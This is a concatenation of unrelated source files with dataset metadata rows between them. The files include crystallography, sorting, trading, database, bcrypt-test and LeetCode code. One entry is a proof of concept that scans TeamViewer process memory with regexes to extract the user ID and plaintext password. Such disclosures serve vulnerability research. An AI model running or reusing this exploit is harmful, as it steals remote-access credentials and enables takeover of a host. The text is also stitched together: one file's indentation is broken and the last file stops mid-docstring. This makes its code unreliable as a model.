from __future__ import absolute_import, division, print_function
from cctbx import sgtbx
def run():
    """Print every conventional space-group setting with its symmetry ops.

    For each of the 530 settings: the universal Hermann-Mauguin symbol,
    then each operation as xyz triplet, as rational matrices, and as raw
    numerator/denominator integers, followed by a blank separator line.
    """
    for entry in sgtbx.space_group_symbol_iterator():
        uhm = entry.universal_hermann_mauguin()
        print(uhm)
        info = sgtbx.space_group_info(symbol=uhm)
        for op in info.group():
            print(op.as_xyz())
        for op in info.group():
            rational = op.as_rational()
            print(rational.r.elems, rational.t.elems)
        for op in info.group():
            print(op.r().num(), op.r().den(), op.t().num(), op.t().den())
        print()
if (__name__ == "__main__"):
run()
| true |
98719ec3b499b1a40d0505f1a9a2c836ae86c1ff | Python | DrMady/PushSwapAPI | /Operations.py | UTF-8 | 1,914 | 2.828125 | 3 | [] | no_license | listA = []
listB = []
def sa(list_ref, pos1, pos2, operation_array):
    """Swap the elements at pos1 and pos2 of stack A in place.

    The 'sa' opcode is recorded unconditionally, even when list_ref is
    empty and no swap actually happens (matches original behaviour).
    """
    if list_ref:
        list_ref[pos1], list_ref[pos2] = list_ref[pos2], list_ref[pos1]
    operation_array.append('sa')
    return list_ref, operation_array
def sb(list_ref, pos1, pos2, operation_array):
    """Swap the elements at pos1 and pos2 of stack B in place.

    The 'sb' opcode is recorded unconditionally, even when list_ref is
    empty and no swap actually happens (matches original behaviour).
    """
    if list_ref:
        list_ref[pos1], list_ref[pos2] = list_ref[pos2], list_ref[pos1]
    operation_array.append('sb')
    return list_ref, operation_array
def sc(operation_array):
    """Swap the tops of both global stacks (listA and listB) at once.

    Delegates to sa()/sb(), so 'sa' and 'sb' are appended to the log
    before 'sc' itself -- same trace as the original implementation.
    """
    for swap_op, stack in ((sa, listA), (sb, listB)):
        swap_op(stack, 0, 1, operation_array)
    operation_array.append('sc')
    return operation_array
def pa(list_ref, list_recipient, operation_array):
    """Push: move the head of list_ref onto the front of list_recipient.

    A no-op on an empty source list, but 'pa' is logged regardless
    (matches original behaviour).
    """
    if list_ref:
        head = list_ref.pop(0)
        list_recipient.insert(0, head)
    operation_array.append('pa')
    return list_ref, operation_array
def pb(list_ref, list_recipient, operation_array):
    """Push: move the head of list_ref onto the front of list_recipient.

    A no-op on an empty source list, but 'pb' is logged regardless
    (matches original behaviour).
    """
    if list_ref:
        head = list_ref.pop(0)
        list_recipient.insert(0, head)
    operation_array.append('pb')
    return list_ref, operation_array
def ra(list_ref, operation_array):
    """Rotate stack up: the first element moves to the back; logs 'ra'.

    Raises IndexError on an empty list (same as the original pop(0)).
    """
    first = list_ref.pop(0)
    list_ref.append(first)
    operation_array.append('ra')
    return list_ref, operation_array
def rb(list_ref, operation_array):
    """Rotate stack up: the first element moves to the back; logs 'rb'.

    Raises IndexError on an empty list (same as the original pop(0)).
    """
    first = list_ref.pop(0)
    list_ref.append(first)
    operation_array.append('rb')
    return list_ref, operation_array
def rr(operation_array):
    """Rotate both global stacks up at once; logs 'ra', 'rb', then 'rr'."""
    for rotate_op, stack in ((ra, listA), (rb, listB)):
        rotate_op(stack, operation_array)
    operation_array.append('rr')
    return operation_array
def rra(list_ref, operation_array):
    """Reverse rotate: the last element moves to the front; logs 'rra'.

    Raises IndexError on an empty list (same as the original pop(-1)).
    """
    list_ref.insert(0, list_ref.pop())
    operation_array.append('rra')
    return list_ref, operation_array
def rrb(list_ref, operation_array):
    """Reverse rotate: the last element moves to the front; logs 'rrb'.

    Raises IndexError on an empty list (same as the original pop(-1)).
    """
    list_ref.insert(0, list_ref.pop())
    operation_array.append('rrb')
    return list_ref, operation_array
def rrr(operation_array):
    """Reverse-rotate both global stacks at once; logs 'rra', 'rrb', 'rrr'."""
    for rotate_op, stack in ((rra, listA), (rrb, listB)):
        rotate_op(stack, operation_array)
    operation_array.append('rrr')
    return operation_array
| true |
49c9047b0f64988629156e85fd6747d9213db7e0 | Python | moxis/bitfinex-ladderer | /app.py | UTF-8 | 777 | 3.046875 | 3 | [
"LicenseRef-scancode-warranty-disclaimer"
] | no_license | import ccxt
import json
# Ladder-order script: splits `capital` evenly across 11 limit orders at
# prices spaced uniformly between the user-supplied boundaries on Bitfinex.
with open("api_key.json", "r") as f:
    keys = json.load(f)
# ccxt exchange client; credentials are merged in from api_key.json
# (presumably apiKey/secret -- verify the file's structure).
bitfinex = ccxt.bitfinex({
    'enableRateLimit': True,
    **keys,
})
capital = float(input('Total capital: '))
lower_range = float(input("Lower boundary: "))
upper_range = float(input("Upper boundary: "))
# Price step: 10 intervals give 11 order prices, boundaries inclusive.
d = (upper_range - lower_range)/10
# NOTE(review): `type` shadows the builtin of the same name.
type = input("BUY (1) OR SELL (2): ")
if type == "1":
    func = bitfinex.create_limit_buy_order
    type_written = "LONG"
else:
    func = bitfinex.create_limit_sell_order
    type_written = "SHORT"
for x in range(0, 11):
    price = round(lower_range + x * d, 1)
    # Equal capital per rung, converted to a BTC amount at that rung's price.
    amount = round((capital/11)/price, 6)
    func('BTC/USDT', amount, price, {'type': 'limit'})
    print(f"Placed a {type_written} order for {amount} BTC at a price of {price}")
| true |
068f9ef44880577a82e7da9209da695ee7c78039 | Python | ChuixinZeng/PythonStudyCode | /PythonCode-OldBoy/Day6/随堂练习/subprocess模块下.py | UTF-8 | 3,028 | 2.9375 | 3 | [] | no_license | # -*- coding:utf-8 -*-
# Author:Chuixin Zeng
import subprocess
# 本小节所有实验都在Linux下的命令行里面进行演示操作
# 常用subprocess方法示例(linux)
'''
#执行命令,返回命令执行状态 , 0 or 非0
>>> retcode = subprocess.call(["ls", "-l"])
#执行命令,如果命令结果为0,就正常返回,否则抛异常
>>> subprocess.check_call(["ls", "-l"])
0
#接收字符串格式命令,返回元组形式,第1个元素是执行状态,第2个是命令结果
>>> subprocess.getstatusoutput('ls /bin/ls')
(0, '/bin/ls')
#接收字符串格式命令,并返回结果
>>> subprocess.getoutput('ls /bin/ls')
'/bin/ls'
#执行命令,并返回结果,注意是返回结果,不是打印,下例结果返回给res
>>> res=subprocess.check_output(['ls','-l'])
>>> res
b'total 0\ndrwxr-xr-x 12 alex staff 408 Nov 2 11:05 OldBoyCRM\n'
#上面那些方法,底层都是封装的subprocess.Popen
'''
# popen的例子(Linux)
'''
# 命令中必须加stdout=subprocess.PIPE,否则第二行的执行无结果,不正确
#例子
>>> p = subprocess.Popen("df -h|grep disk",stdin=subprocess.PIPE,stdout=subprocess.PIPE,shell=True)
>>> p.stdout.read()
b'/dev/disk1 465Gi 64Gi 400Gi 14% 16901472 104938142 14% /\n'
stdin 标准输入
stdout 标准输出
stderr 标准错误
poll()
Check if child process has terminated. Returns returncode
print(res.poll()) # 如果命令没执行完,返回none,如果命令执行完了,返回0
wait()
Wait for child process to terminate. Returns returncode attribute.
print(res.wait()) # 这个就是等待结果出来后,再返回结果0
res.terminate() # 杀掉所启动进程
res.communicate() # 等待任务结束,用的非常少
# popen还有其他一些参数可以使用如下
args:shell命令,可以是字符串或者序列类型(如:list,元组)
bufsize:指定缓冲。0 无缓冲,1 行缓冲,其他 缓冲区大小,负值 系统缓冲
stdin, stdout, stderr:分别表示程序的标准输入、输出、错误句柄
preexec_fn:只在Unix平台下有效,用于指定一个可执行对象(callable object),它将在子进程运行之前被调用
close_sfs:在windows平台下,如果close_fds被设置为True,则新创建的子进程将不会继承父进程的输入、输出、错误管道。
所以不能将close_fds设置为True同时重定向子进程的标准输入、输出与错误(stdin, stdout, stderr)。
shell:同上
cwd:用于设置子进程的当前目录
env:用于指定子进程的环境变量。如果env = None,子进程的环境变量将从父进程中继承。
universal_newlines:不同系统的换行符不同,True -> 同意使用 \n
startupinfo与createionflags只在windows下有效
将被传递给底层的CreateProcess()函数,用于设置子进程的一些属性,如:主窗口的外观,进程的优先级等等
终端输入的命令分为两种:
输入即可得到输出,如:ifconfig
输入进行某环境,依赖再输入,如:pytho
'''
| true |
f125c5cedd8d4bffb4d3d71df8da5a1fdff9a40e | Python | ratatouille0822/thread | /test_thread.py | UTF-8 | 386 | 3.375 | 3 | [] | no_license | import time
import threading as th
def sing():
    """Print "唱歌" four times, pausing one second before each print."""
    for _ in range(4):
        time.sleep(1)
        print("唱歌")
def dance():
    """Print "跳舞" four times, pausing one second before each print."""
    for _ in range(4):
        time.sleep(1)
        print("跳舞")
def main():
    """Run sing() and dance() concurrently on two threads (not joined)."""
    singer = th.Thread(target=sing)
    dancer = th.Thread(target=dance)
    singer.start()
    dancer.start()
# Run the threading demo when executed as a script.
if __name__ == "__main__":
    main()
| true |
e11ef7fa22620cebd1c3de7105809062b5455527 | Python | PederHA/vjemmie | /vjemmie/utils/sound.py | UTF-8 | 1,511 | 2.90625 | 3 | [
"MIT"
] | permissive | import subprocess
import wave
from pathlib import Path
import shlex
def convert(filepath: Path, to_wav: bool) -> Path:
    """Convert an audio file between .mp3 and .wav using ffmpeg.

    Args:
        filepath: Path to the source audio file.
        to_wav: If True, produce a .wav (PCM u8 at 44100 Hz); otherwise
            produce an .mp3 (libmp3lame at 128 kbps).

    Returns:
        Path of the converted file (same stem, new suffix).
    """
    outfile = filepath.with_suffix(".wav") if to_wav else filepath.with_suffix(".mp3")
    # Build the argv list directly instead of formatting a shell-style string
    # and re-splitting it with shlex: that round-trip broke on paths that
    # contain quote characters. The ffmpeg options are unchanged.
    if to_wav:
        codec_args = ["-acodec", "pcm_u8", "-ar", "44100"]
    else:
        codec_args = ["-acodec", "libmp3lame", "-ab", "128k"]
    cmd = ["ffmpeg", "-y", "-i", str(filepath.absolute()), *codec_args, str(outfile.absolute())]
    subprocess.Popen(cmd, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL).wait()
    return outfile
def join_wavs(file_1: Path, file_2: Path) -> Path:
    """Concatenate two .wav files into a new '<a>_<b>.wav' next to file_1.

    The output uses the wave parameters (channels/width/rate) of *file_1*.
    NOTE(review): this assumes both inputs share the same parameters;
    otherwise the second clip will play back incorrectly -- confirm.

    Raises:
        FileNotFoundError: if either input file is missing.
        FileExistsError: if the target file already exists.
    """
    for p in [file_1, file_2]:
        if not p.exists():
            # NOTE: Should this error be tailored towards users of the bot or the developer?
            raise FileNotFoundError(f"'{p.stem}' does not exist!")
    # Get wave file data: one [params, raw frames] pair per input file.
    wav_data = []
    for f in [file_1, file_2]:
        with wave.open(str(f), "rb") as w:
            wav_data.append([w.getparams(), w.readframes(w.getnframes())])
    fname = Path(f"{file_1.parent}/{file_1.stem}_{file_2.stem}.wav")
    if fname.exists():
        raise FileExistsError(f"{fname.stem} already exists!")
    # Join wave files: file_1's header/params, then both frame blobs in order.
    with wave.open(str(fname), "wb") as wavfile:
        wavfile.setparams(wav_data[0][0])
        wavfile.writeframes(wav_data[0][1])
        wavfile.writeframes(wav_data[1][1])
    # Return filename and relative filepath
    return fname
| true |
ec42ad8fce4803cb71af0578575bc52cd3fb5f89 | Python | shewey/exploit-db | /platforms/windows/local/40342.py | UTF-8 | 2,653 | 2.53125 | 3 | [] | no_license | #####
# TeamViewer 11.0.65452 (64 bit) Local Credentials Disclosure
# Tested on Windows 7 64bit, English
# Vendor Homepage @ https://www.teamviewer.com/
# Date 07/09/2016
# Bug Discovered by Alexander Korznikov (https://www.linkedin.com/in/nopernik)
#
# http://www.korznikov.com | @nopernik
#
# Special Thanks to:
# Viktor Minin (https://www.exploit-db.com/author/?a=8052) | (https://1-33-7.com/)
# Yakir Wizman (https://www.exploit-db.com/author/?a=1002) | (http://www.black-rose.ml)
#
#####
# TeamViewer 11.0.65452 is vulnerable to local credentials disclosure, the supplied userid and password are stored in a plaintext format in memory process.
# There is no need in privilege account access. Credentials are stored in context of regular user.
# A potential attacker could reveal the supplied username and password automaticaly and gain persistent access to host via TeamViewer services.
#
# Proof-Of-Concept Code:
#####
from winappdbg import Debug, Process, HexDump
import sys
import re
filename = 'TeamViewer.exe'
def memory_search( pid ):
    """Scan the target process memory for TeamViewer login credentials.

    Prints candidate user IDs and the recovered password(s); returns the
    list of raw password-buffer matches. Python 2 / winappdbg code.
    """
    found = []
    # Instance a Process object.
    process = Process( pid )
    # Search for the string in the process memory.
    # Looking for User ID: three groups of 3 digits interleaved with NUL
    # bytes (UTF-16LE-style "123 456 789"), not followed by ')'.
    userid_pattern = '([0-9]\x00){3} \x00([0-9]\x00){3} \x00([0-9]\x00){3}[^)]'
    for address in process.search_regexp( userid_pattern ):
        found += [address]
    print 'Possible UserIDs found:'
    # NOTE(review): assumes the matched bytes are the last element of each
    # search_regexp() hit -- confirm against winappdbg's return format.
    found = [i[-1] for i in found]
    for i in set(found):
        print i.replace('\x00','')
    found = []
    # Looking for Password: four NUL-interleaved digits followed by a fixed
    # byte pattern observed around the in-memory credential buffer.
    pass_pattern = '([0-9]\x00){4}\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x07\x00\x00'
    for address in process.search_regexp( pass_pattern ):
        # Read 16 bytes starting 3 bytes before the match start address.
        found += [process.read(address[0]-3,16)]
    if found:
        print '\nPassword:'
        if len(found) > 1:
            # Keep only buffers seen more than once to filter noise.
            s = list(set([x for x in found if found.count(x) > 1]))
            for i in s:
                pwd = re.findall('[0-9]{4}',i.replace('\x00',''))[0]
                print pwd
        else:
            print re.findall('[0-9]{4}',found[0].replace('\x00',''))[0]
    return found
debug = Debug()
try:
# Lookup the currently running processes.
debug.system.scan_processes()
# For all processes that match the requested filename...
for ( process, name ) in debug.system.find_processes_by_filename( filename ):
pid = process.get_pid()
memory_search(pid)
finally:
debug.stop()
| true |
fe01d02b293e8922eed311090acd464c68b8cae3 | Python | luccasPh/clean-python-api | /tests/infra/cryptography/test_bcrypt_adapter.py | UTF-8 | 2,248 | 2.859375 | 3 | [] | no_license | import pytest
from mock import patch, MagicMock
from app.infra import BcryptAdapter
SALT = b"$2b$12$9ITqN6psxZRjP8hN04j8Be"
@pytest.fixture
def sut():
sut = BcryptAdapter(SALT)
yield sut
@patch("app.infra.cryptography.bcrypt_adapter.hashpw")
def test_should_call_hash_with_correct_values(
mock_hashpw: MagicMock, sut: BcryptAdapter
):
value = "any_value"
sut.hash(value)
mock_hashpw.assert_called_with(value.encode("utf-8"), SALT)
@patch("app.infra.cryptography.bcrypt_adapter.hashpw")
def test_should_return_hash_on_hash_success(mock_hashpw: MagicMock, sut: BcryptAdapter):
value = "hash"
mock_hashpw.return_value = value.encode("utf-8")
hash = sut.hash("any_value")
assert hash == "hash"
@patch("app.infra.cryptography.bcrypt_adapter.hashpw")
def test_should_raise_exception_if_hash_raise(
mock_hashpw: MagicMock, sut: BcryptAdapter
):
mock_hashpw.side_effect = Exception()
with pytest.raises(Exception) as excinfo:
assert sut.hash("any_value")
assert type(excinfo.value) is Exception
@patch("app.infra.cryptography.bcrypt_adapter.checkpw")
def test_should_call_compare_with_correct_values(
mock_checkpw: MagicMock, sut: BcryptAdapter
):
value = "any_value"
hash = "any_hash"
sut.compare(value, hash)
mock_checkpw.assert_called_with(value.encode("utf-8"), hash.encode("utf-8"))
@patch("app.infra.cryptography.bcrypt_adapter.checkpw")
def test_should_return_true_on_compare_success(
mock_checkpw: MagicMock, sut: BcryptAdapter
):
mock_checkpw.return_value = True
result = sut.compare("any_value", "any_hash")
assert result
@patch("app.infra.cryptography.bcrypt_adapter.checkpw")
def test_should_return_false_on_compare_fails(
mock_checkpw: MagicMock, sut: BcryptAdapter
):
mock_checkpw.return_value = False
result = sut.compare("any_value", "any_hash")
assert not result
@patch("app.infra.cryptography.bcrypt_adapter.checkpw")
def test_should_raise_exception_if_compare_raise(
mock_checkpw: MagicMock, sut: BcryptAdapter
):
mock_checkpw.side_effect = Exception()
with pytest.raises(Exception) as excinfo:
assert sut.compare("any_value", "any_hash")
assert type(excinfo.value) is Exception
| true |
9c36d30c2d092823ec16d07cefe1c905e41ba2c1 | Python | yangjiahao106/LeetCode | /Python3/62_Unique_Paths.py | UTF-8 | 1,576 | 3.484375 | 3 | [
"MIT"
] | permissive | #! python3
# __author__ = "YangJiaHao"
# date: 2018/2/28
class Solution:
    """Breadth-first enumeration of all monotone lattice paths.

    Expands every partial path one step (right or down) per iteration;
    the answer is the number of partial paths that have reached (m, n).
    Exponential in m+n (there are C(m+n-2, m-1) paths) -- kept for
    illustration; see Solution2 for the O(m*n) dynamic program.
    """
    def uniquePaths(self, m, n):
        """
        :type m: int
        :type n: int
        :rtype: int
        """
        frontier = [[1, 1]]
        while True:
            nxt = []
            advanced = False
            for pos in frontier:
                if pos[0] < m:
                    nxt.append([pos[0] + 1, pos[1]])
                    # Bug fix: the original set a misspelled name 'flap'
                    # here, so down-only expansions never marked progress.
                    advanced = True
                if pos[1] < n:
                    nxt.append([pos[0], pos[1] + 1])
                    advanced = True
                if pos[0] == m and pos[1] == n:
                    nxt.append(pos)
            frontier = nxt
            if not advanced:
                return len(frontier)
class Solution2:
    """Classic O(m*n) dynamic-programming solution.

    grid[i][j] counts the distinct right/down paths from the top-left
    corner to cell (i, j); the first row and first column are all 1.
    """
    def uniquePaths(self, m, n):
        """
        :type m: int
        :type n: int
        :rtype: int
        """
        grid = [[1] * n for _ in range(m)]
        for row in range(1, m):
            for col in range(1, n):
                grid[row][col] = grid[row][col - 1] + grid[row - 1][col]
        return grid[-1][-1]
class Solution:
    """DP variant with a one-cell zero border, so the first row/column
    need no separate initialization; the start cell is seeded with 1."""
    def uniquePaths(self, m: int, n: int) -> int:
        table = [[0] * (n + 1) for _ in range(m + 1)]
        table[1][1] = 1
        for row in range(1, m + 1):
            for col in range(1, n + 1):
                if row != 1 or col != 1:
                    table[row][col] = table[row - 1][col] + table[row][col - 1]
        return table[-1][-1]
# Quick manual check: a 2x2 grid has 2 unique paths.
if __name__ == '__main__':
    so = Solution2()
    res = so.uniquePaths(2, 2)
    print(res)
| true |
815a3ad913d59f20ec73d124fb41fe54b723800e | Python | chenghao/web_setup | /db/dbutil.py | UTF-8 | 11,191 | 2.546875 | 3 | [] | no_license | # coding:utf-8
__author__ = 'chenghao'
'''
Database operation module. This module is independent with web module.
'''
import time, functools, threading
from config import logger
from utils import Dict
def _profiling(start, sql=''):
    # Log how long a statement took; anything slower than 100 ms is a warning.
    elapsed = time.time() - start
    log_fn = logger.warning if elapsed > 0.1 else logger.info
    log_fn('[PROFILING] [DB] %s: %s' % (elapsed, sql))
class DBError(Exception):
    '''Base exception for all database-layer errors raised by this module.'''
    pass
class MultiColumnsError(DBError):
    '''Raised when a single-column query unexpectedly returns multiple columns.'''
    pass
def _log(s):
    # Thin wrapper so the module's debug logging can be redirected in one place.
    logger.debug(s)
def _dummy_connect():
    '''
    Placeholder connect function used before the module is configured.
    It is replaced by a real connection factory in init(...) /
    init_connector(...); calling it directly always raises DBError.
    '''
    raise DBError('Database is not initialized. call init(dbn, ...) first.')
_db_connect = _dummy_connect
_db_convert = '?'
class _LasyConnection(object):
    '''
    Lazily-opened DB connection: the real connection is only created on
    the first cursor() call, not at construction time. (The class keeps
    the original "Lasy" spelling since other code may reference it.)
    '''
    def __init__(self):
        self.connection = None
    def cursor(self):
        # Open the underlying connection on first use.
        if self.connection is None:
            _log('open connection...')
            self.connection = _db_connect()
        return self.connection.cursor()
    def commit(self):
        self.connection.commit()
    def rollback(self):
        self.connection.rollback()
    def cleanup(self):
        # Detach the reference before closing so a failing close() cannot
        # leave a half-usable connection behind.
        if self.connection:
            connection = self.connection
            self.connection = None
            _log('close connection...')
            connection.close()
class _DbCtx(threading.local):
    '''
    Thread local object that holds connection info.

    Each thread gets its own lazy connection plus a nesting counter for
    transactions (managed by _TransactionCtx).
    '''
    def __init__(self):
        self.connection = None
        self.transactions = 0
    def is_init(self):
        # True once init() has attached a (lazy) connection to this thread.
        return not self.connection is None
    def init(self):
        _log('open lazy connection...')
        self.connection = _LasyConnection()
        self.transactions = 0
    def cleanup(self):
        self.connection.cleanup()
    def cursor(self):
        '''
        Return a cursor from this thread's current connection.
        '''
        return self.connection.cursor()
_db_ctx = _DbCtx()
class _ConnectionCtx(object):
    '''
    _ConnectionCtx object that can open and close connection context. _ConnectionCtx object can be nested and only the most
    outer connection has effect.
    with connection():
        pass
        with connection():
            pass
    '''
    def __enter__(self):
        global _db_ctx
        self.should_cleanup = False
        # Only the outermost context actually opens (and later closes) the
        # thread-local connection; nested contexts are no-ops.
        if not _db_ctx.is_init():
            _db_ctx.init()
            self.should_cleanup = True
        return self
    def __exit__(self, exctype, excvalue, traceback):
        global _db_ctx
        if self.should_cleanup:
            _db_ctx.cleanup()
def connection():
    '''
    Factory for a shared-connection context manager; intended usage:

    with connection():
        ...do database work on one connection...
    '''
    return _ConnectionCtx()
def with_connection(func):
    '''
    Decorator form of connection(): wraps *func* so its whole body runs
    inside one shared-connection context.

    @with_connection
    def foo(*args, **kw):
        ...
    '''
    @functools.wraps(func)
    def _connected(*args, **kw):
        with _ConnectionCtx():
            return func(*args, **kw)
    return _connected
class _TransactionCtx(object):
    '''
    _TransactionCtx object that can handle transactions.

    Transactions nest: only the outermost context commits (on success)
    or rolls back (on exception); inner contexts merely join it.

    with _TransactionCtx():
        pass
    '''
    def __enter__(self):
        global _db_ctx
        self.should_close_conn = False
        if not _db_ctx.is_init():
            # needs open a connection first:
            _db_ctx.init()
            self.should_close_conn = True
        _db_ctx.transactions = _db_ctx.transactions + 1
        _log('begin transaction...' if _db_ctx.transactions == 1 else 'join current transaction...')
        return self
    def __exit__(self, exctype, excvalue, traceback):
        global _db_ctx
        _db_ctx.transactions = _db_ctx.transactions - 1
        try:
            # Only the outermost transaction decides commit vs rollback.
            if _db_ctx.transactions == 0:
                if exctype is None:
                    self.commit()
                else:
                    self.rollback()
        finally:
            # Close the connection we opened, even if commit/rollback raised.
            if self.should_close_conn:
                _db_ctx.cleanup()
    def commit(self):
        global _db_ctx
        _log('commit transaction...')
        try:
            _db_ctx.connection.commit()
            _log('commit ok.')
        # NOTE(review): bare except also catches KeyboardInterrupt/SystemExit
        # before re-raising; consider narrowing to Exception.
        except:
            logger.warning('commit failed. try rollback...')
            _db_ctx.connection.rollback()
            logger.warning('rollback ok.')
            raise
    def rollback(self):
        global _db_ctx
        _log('manully rollback transaction...')
        _db_ctx.connection.rollback()
        logger.info('rollback ok.')
def transaction():
    '''
    Factory for a transaction context manager; intended usage:

    with transaction():
        ...statements committed or rolled back together...
    '''
    return _TransactionCtx()
def with_transaction(func):
    '''
    A decorator that runs the wrapped function inside a database
    transaction and records how long the call took.

    Bug fix: the original placed _profiling(_start) after the `return`
    inside the `with` block, making it unreachable; a try/finally now
    guarantees the timing is logged on both success and failure.
    '''
    @functools.wraps(func)
    def _wrapper(*args, **kw):
        _start = time.time()
        try:
            with _TransactionCtx():
                return func(*args, **kw)
        finally:
            _profiling(_start)
    return _wrapper
def _select(sql, first, *args):
    '''
    Execute select SQL and return unique result or list results.

    :param sql: statement using '?' placeholders (translated to the
        driver's placeholder, e.g. '%s' for MySQL, before execution)
    :param first: if True return only the first row (or None when there
        is no match); otherwise return a list of all rows
    :return: Dict row(s) keyed by the cursor's column names
    '''
    global _db_ctx, _db_convert
    cursor = None
    if _db_convert != '?':
        sql = sql.replace('?', _db_convert)
    _log('SQL: %s, ARGS: %s' % (sql, args))
    start = time.time()
    try:
        cursor = _db_ctx.connection.cursor()
        cursor.execute(sql, args)
        # NOTE(review): if cursor.description is empty, `names` stays unbound
        # and the Dict() calls below raise NameError -- confirm that only
        # row-returning statements reach this function.
        if cursor.description:
            names = [x[0] for x in cursor.description]
        if first:
            values = cursor.fetchone()
            if not values:
                return None
            return Dict(names, values)
        return [Dict(names, x) for x in cursor.fetchall()]
    finally:
        # Always close the cursor and record timing, even on error.
        if cursor:
            cursor.close()
        _profiling(start, sql)
@with_connection
def select_one(sql, *args):
    '''
    Run a SELECT and return a single row, or None when nothing matches.
    When several rows match, only the first one is returned.
    '''
    return _select(sql, True, *args)
@with_connection
def select_int(sql, *args):
    '''
    Execute select SQL and expect exactly one row with one int column.

    Raises:
        DBError: if the query returned no row at all (the original code
            crashed with a TypeError on len(None) in that case).
        MultiColumnsError: if the row has more than one column.
    '''
    d = _select(sql, True, *args)
    if d is None:
        raise DBError('Expect one row, but no result returned.')
    if len(d) != 1:
        raise MultiColumnsError('Expect only one column.')
    return d.values()[0]
@with_connection
def select(sql, *args):
'''
Execute select SQL and return list or empty list if no result.
> u1 = dict(id=200, name='Wall.E', email='wall.e@test.org', passwd='back-to-earth', last_modified=time.time())
> u2 = dict(id=201, name='Eva', email='eva@test.org', passwd='back-to-earth', last_modified=time.time())
> insert('user', **u1)
1
> insert('user', **u2)
1
> L = select('select * from user where id=?', 900900900)
> L
[]
> L = select('select * from user where id=?', 200)
> L[0].email
u'wall.e@test.org'
> L = select('select * from user where passwd=? order by id desc', 'back-to-earth')
> L[0].name
u'Eva'
> L[1].name
u'Wall.E'
'''
return _select(sql, False, *args)
@with_connection
def _update(sql, args, post_fn=None):
    '''
    Execute an INSERT/UPDATE/DELETE statement and return the affected
    row count. Outside a transaction the statement is auto-committed and
    `post_fn` (if given) is invoked after the commit.
    '''
    global _db_ctx, _db_convert
    cursor = None
    if _db_convert != '?':
        sql = sql.replace('?', _db_convert)
    _log('SQL: %s, ARGS: %s' % (sql, args))
    start = time.time()
    try:
        cursor = _db_ctx.connection.cursor()
        cursor.execute(sql, args)
        r = cursor.rowcount
        if _db_ctx.transactions == 0:
            # no transaction environment: commit immediately
            _log('auto commit')
            _db_ctx.connection.commit()
            post_fn and post_fn()
        return r
    finally:
        # Always close the cursor and record timing, even on error.
        if cursor:
            cursor.close()
        _profiling(start, sql)
def insert(table, **kw):
'''
Execute insert SQL.
> u1 = dict(id=2000, name='Bob', email='bob@test.org', passwd='bobobob', last_modified=time.time())
> insert('user', **u1)
1
> u2 = select_one('select * from user where id=?', 2000)
> u2.name
u'Bob'
> insert('user', **u2)
Traceback (most recent call last):
...
IntegrityError: column id is not unique
'''
cols, args = zip(*kw.iteritems())
sql = 'insert into %s (%s) values (%s)' % (table, ','.join(cols), ','.join([_db_convert for i in range(len(cols))]))
return _update(sql, args)
def update(sql, *args):
'''
Execute update SQL.
> u1 = dict(id=1000, name='Michael', email='michael@test.org', passwd='123456', last_modified=time.time())
> insert('user', **u1)
1
> u2 = select_one('select * from user where id=?', 1000)
> u2.email
u'michael@test.org'
> u2.passwd
u'123456'
> update('update user set email=?, passwd=? where id=?', 'michael@example.org', '654321', 1000)
1
> u3 = select_one('select * from user where id=?', 1000)
> u3.email
u'michael@example.org'
> u3.passwd
u'654321'
'''
return _update(sql, args)
def update_kw(table, where, *args, **kw):
'''
Execute update SQL by table, where, args and kw.
> u1 = dict(id=900900, name='Maya', email='maya@test.org', passwd='MAYA', last_modified=time.time())
> insert('user', **u1)
1
> u2 = select_one('select * from user where id=?', 900900)
> u2.email
u'maya@test.org'
> u2.passwd
u'MAYA'
> update_kw('user', 'id=?', 900900, name='Kate', email='kate@example.org')
1
> u3 = select_one('select * from user where id=?', 900900)
> u3.name
u'Kate'
> u3.email
u'kate@example.org'
> u3.passwd
u'MAYA'
'''
if len(kw) == 0:
raise ValueError('No kw args.')
sqls = ['update', table, 'set']
params = []
updates = []
for k, v in kw.iteritems():
updates.append('%s=?' % k)
params.append(v)
sqls.append(', '.join(updates))
sqls.append('where')
sqls.append(where)
sql = ' '.join(sqls)
params.extend(args)
return update(sql, *params)
def init_connector(func_connect, convert_char='%s'):
    '''
    Register a custom connection factory and its SQL placeholder token.

    Args:
        func_connect: zero-argument callable returning a new DB-API connection.
        convert_char: placeholder token the driver expects ('%s' or '?').
    '''
    global _db_connect, _db_convert
    _log('init connector...')
    _db_connect = func_connect
    _db_convert = convert_char
def init(db_type, db_schema, db_host, db_port=0, db_user=None, db_password=None, db_driver=None, **db_args):
    '''
    Initialize database.

    Args:
        db_type: db type, 'mysql', 'sqlite3'.
        db_schema: schema name.
        db_host: db host.
        db_user: username.
        db_password: password.
        db_driver: db driver, default to None.
        **db_args: other parameters, e.g. use_unicode=True

    Raises:
        DBError: if db_type is not one of the supported backends.
    '''
    global _db_connect, _db_convert
    if db_type == 'mysql':
        _log('init mysql...')
        import MySQLdb
        # Sensible defaults for text handling unless the caller overrides them.
        if not 'use_unicode' in db_args:
            db_args['use_unicode'] = True
        if not 'charset' in db_args:
            db_args['charset'] = 'utf8'
        if db_port == 0:
            db_port = 3306
        _db_connect = lambda: MySQLdb.connect(db_host, db_user, db_password, db_schema, db_port, **db_args)
        _db_convert = '%s'
    elif db_type == 'sqlite3':
        _log('init sqlite3...')
        import sqlite3
        # For sqlite the "schema" is the database file path; host/port are unused.
        _db_connect = lambda: sqlite3.connect(db_schema)
    else:
        raise DBError('Unsupported db: %s' % db_type)
2a1a3195e8cbfc6ad74c924d3b91b2042e9c2e66 | Python | DictaVizor/sitec-redesign | /sitec/sitec_api/utils.py | UTF-8 | 166 | 3.421875 | 3 | [] | no_license | def chunks(list, n):
    """Yield successive n-sized slices of *list* (the last chunk may be shorter).

    NOTE(review): the parameter shadows the builtin ``list``; renaming it would
    change the keyword-argument interface, so it is left as-is.
    """
    for i in range(0, len(list), n):
        yield list[i:i + n]
def clean_spanish_characters(string):
    """Map every Unicode replacement character (U+FFFD) back to 'ñ'."""
    return string.translate({0xFFFD: 'ñ'})
fb9adec00db74be316e4303378df8a4b09322db3 | Python | daniel-reich/turbo-robot | /GYJcHcgbpKYE75vYd_14.py | UTF-8 | 1,046 | 4.1875 | 4 | [] | no_license | """
Create a function that takes an integer and returns it as an **ordinal
number**. An Ordinal Number is a number that tells the position of something
in a list, such as 1st, 2nd, 3rd, 4th, 5th, etc.
### Examples
return_end_of_number(553) ➞ "553-RD"
return_end_of_number(34) ➞ "34-TH"
return_end_of_number(1231) ➞ "1231-ST"
return_end_of_number(22) ➞ "22-ND"
